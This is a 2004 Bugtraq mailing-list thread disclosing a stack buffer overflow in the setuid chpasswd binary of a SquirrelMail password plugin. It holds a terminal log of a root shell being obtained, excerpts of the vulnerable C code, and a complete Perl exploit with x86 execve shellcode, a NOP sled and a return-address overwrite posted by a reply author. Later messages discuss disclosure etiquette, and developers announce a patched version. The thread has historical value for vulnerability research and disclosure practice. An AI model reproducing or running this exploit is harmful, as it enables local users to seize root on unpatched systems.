Hi all

There is a boffer over flow in the chpasswd binary, distributed with the=20
plugin. This allow to local's user to execute commands as a root.
=2D--:::Prott:::---
root@orco:/mnt/hosting/hack/bof# su webmaster
webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
Using address: 0xbfffe325
bash-2.05b$ ./chpasswd $RET asdf asdf
The new password is equal to old password. Choose another password.
sh-2.05b# id
uid=3D0(root) gid=3D3(sys) groups=3D500(webmaster)
sh-2.05b#
=2D--:::end:::---

Bye all

--T4sUOijqQbZv57TR
Content-Type: text/plain; charset=iso-8859-15
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

also sprach Matias Neiff <matias@neiff.com.ar> [2004.04.17.0920 +0200]:
> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999

can we please see the code for this exploit?

--=20
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net@madduck
=20
invalid/expired pgp subkeys? use subkeys.pgp.net as keyserver!
=20
"those who are faithful know only the trivial side of love:
it is the faithless who know love's tragedies."
-- oscar wilde

--T4sUOijqQbZv57TR
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAgYfIIgvIgzMMSnURAieHAJ9F1pLb0wnFK7cvPK0DhZ c2UYuDtQCeMYUc
RbVP/FMjxblUlkwSA7N5PY4=
=C9k2
-----END PGP SIGNATURE-----

--T4sUOijqQbZv57TR--

In-Reply-To: <20040417193848.GA31925@piper.madduck.net>

Hi
>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?

Certainly, but i admire your courage to ask for such a simple one tho :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privieledge without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]); /* heh */
sprintf(Old_pw,"%s",argv[2]); /* heh */
sprintf(New_pw,"%s",argv[3]); /* heh */

/* some humor */
if(!strcmp(User,"root")){
printf("The %s user cannot be edited for security reasons.\n",User);
return 4; //the root user cannot be edited for security reasons
}

/* .. snip .. */
strcpy(PUser,User); /* heh! */

/* we all see the problems here, no? */
<---snip--->
Some lame 5minute-code, should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;

my $ret = 0xbffff732; # ret, worked for me, prolly won't for you. change it.
my $length = 190; # buffer length for smashing without ruining it
my $eipdist = 144; # distance to overwrite eip
my $offset = 0; # offset
my $numnops = 10; # number of nops?
my $nop = "\x90"; # nop
my $pw = 'heh'; # random string, heh, 3 chars for current $ret

# dunno where this came from, it was just lying there.
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
"\x68\x2f\x2f\x62\x69\x89\xe3\x52".
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

sub generate_string($$$) {
my ($r, $o, $len) = @_;
my $buffer;
my $i;

my $new_ret = pack('l', ($r + $o));

for($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
for($i = 0; $i < $numnops; ++$i) { $buffer .= $nop; }
$buffer .= $shellcode;

return $buffer;
}

if($ARGV[0]) { $offset = $ARGV[0]; }

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

my $evil = generate_string($ret, $offset ,$length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end---->

- rip

In-Reply-To: <200404170420.32857.matias@neiff.com.ar>

Hi,

Did u drink to much when writing this `advisory'? No seriously, you even made a typo in the title of your thread!
did you inform the people at Squirrelmail about this? I located the exact vuln in chpasspwd.c:
----
char User[STR_MAX];
char New_pw[50];
char Old_pw[50];

..

sprintf(User,"%s",argv[1]);
sprintf(Old_pw,"%s",argv[2]);
sprintf(New_pw,"%s",argv[3]);
---

STR_MAX has a value of 100. So as you probably already have seen there occurs a stack based overflow when user, old_pw or new_pw is filled with to much bytes (which come from argv[], commandline). In your `exploitation example' you used local rights to ex
ploits this. However, I think it's also possible to exploit without shell access, using the squirrelmail webinterface itself. I'm at work right now, but when I'm home I'll be looking into creating a PoC exploit for this one.

Best regards,
Peter "blasty" Geissler

P.S. The version of the chpasswd plugin found on the squirrelmail/SF page is still vulnerable to this bug, so I doubt you informed the people at squirrelmail..

>Received: (qmail 32672 invoked from network); 17 Apr 2004 18:56:45 -0000
>Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.26)
> by mail.securityfocus.com with SMTP; 17 Apr 2004 18:56:45 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing.securityfocus.com (Postfix) with QMQP
> id 5F4D9145D46; Sat, 17 Apr 2004 20:47:01 -0600 (MDT)
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Received: (qmail 9581 invoked from network); 17 Apr 2004 01:13:14 -0000
>From: Matias Neiff <matias@neiff.com.ar>
>To: bugtraq@securityfocus.com
>Subject: Squirrelmail Chpasswod bof
>Date: Sat, 17 Apr 2004 04:20:26 -0300
>User-Agent: KMail/1.5.4
>Organization: Pulso
>MIME-Version: 1.0
>Content-Type: Text/Plain;
> charset="us-ascii"
>Content-Transfer-Encoding: quoted-printable
>Content-Description: clearsigned data
>Content-Disposition: inline
>Message-Id: <200404170420.32857.matias@neiff.com.ar>
>
>Hi all
>
>There is a boffer over flow in the chpasswd binary, distributed with the=20
>plugin. This allow to local's user to execute commands as a root.
>=2D--:::Prott:::---
>root@orco:/mnt/hosting/hack/bof# su webmaster
>webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>Using address: 0xbfffe325
>bash-2.05b$ ./chpasswd $RET asdf asdf
>The new password is equal to old password. Choose another password.
>sh-2.05b# id
>uid=3D0(root) gid=3D3(sys) groups=3D500(webmaster)
>sh-2.05b#
>=2D--:::end:::---
>
>Bye all
>
>

Hello Matias,
On Saturday, April 17, 2004, Matias Neiff wrote...

> There is a boffer over flow in the chpasswd binary, distributed with the
> plugin. This allow to local's user to execute commands as a root.

It should be noted that while this is a plugin for SquirrelMail, it is
not distributed as part of the SquirrelMail installation, and
generally not supported by the SquirrelMail development team. However,
due to the issue, we are looking into correcting this problem.

--
Jonathan Angliss
(jon@squirrelmail.org)

All,

Replying to this thread using the web interface didn't seem to work
at all, so... Please excuse me effectively starting the thread over,
but wanted to make sure a follow-up got posted to the list. See:

http://www.securityfocus.com/archive/1/360547/2004-04-14/2004-04-20/2

> Hi all
>
> There is a boffer over flow in the chpasswd binary, distributed with
> the plugin. This allow to local's user to execute commands as a root.

This problem (and several others that were really needing to be
fixed) has been resolved and a new version of this plugin is available
at the link below. Obviously, it is highly recommended that anyone
using this plugin upgrade immediately.

http://www.squirrelmail.org/plugin_view.php?id=117

Matias, next time please contact the plugin authors, any of the
SquirrelMail mailing lists, SquirrelMail IRC, or other SquirrelMail
developers before posting.

Thanks,

Paul


> ---:::Prott:::---
> root@orco:/mnt/hosting/hack/bof# su webmaster
> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
> Using address: 0xbfffe325
> bash-2.05b$ ./chpasswd $RET asdf asdf
> The new password is equal to old password. Choose another password.
> sh-2.05b# id
> uid=0(root) gid=3(sys) groups=500(webmaster)
> sh-2.05b#
> ---:::end:::---
>
> Bye all